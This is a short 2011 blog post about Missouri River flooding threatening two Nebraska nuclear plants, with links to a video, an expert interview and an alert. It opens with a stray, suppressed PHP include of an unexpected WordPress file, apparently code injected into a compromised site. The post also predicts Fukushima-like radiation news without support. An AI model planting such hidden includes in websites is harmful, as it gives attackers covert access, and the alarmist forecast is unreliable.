@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); US Flooding 2011, 2 Nebraska Nuclear Power Plants in Crisis, No Fly Zones - My Family Health Blog

US Flooding 2011, 2 Nebraska Nuclear Power Plants in Crisis, No Fly Zones

Google for US Flooding 2011 and be astonished why in this year 2011 the USA experiences the worst floods connected with the Mississippi river in history. Levees are going to be breached. Towns are being evacuated. 2 nuclear power plants being sand bagged as dikes against the ever rising flood waters. No fly zones are ordered over the 2 nuclear power plants. Brace yourself for Fukushima type late news regarding radiation spills.

Video of the flood in the Missouri river endangering the Fort Calhoun Nuclear power plant in Nebraska.

Interview with nuclear expert Arnie Gunderson on the prospects of this flood and the nuclear power plant.

Emergency Alert : Nebraska Cooper Nuclear Power Plant Prepares For Missouri River Flooding

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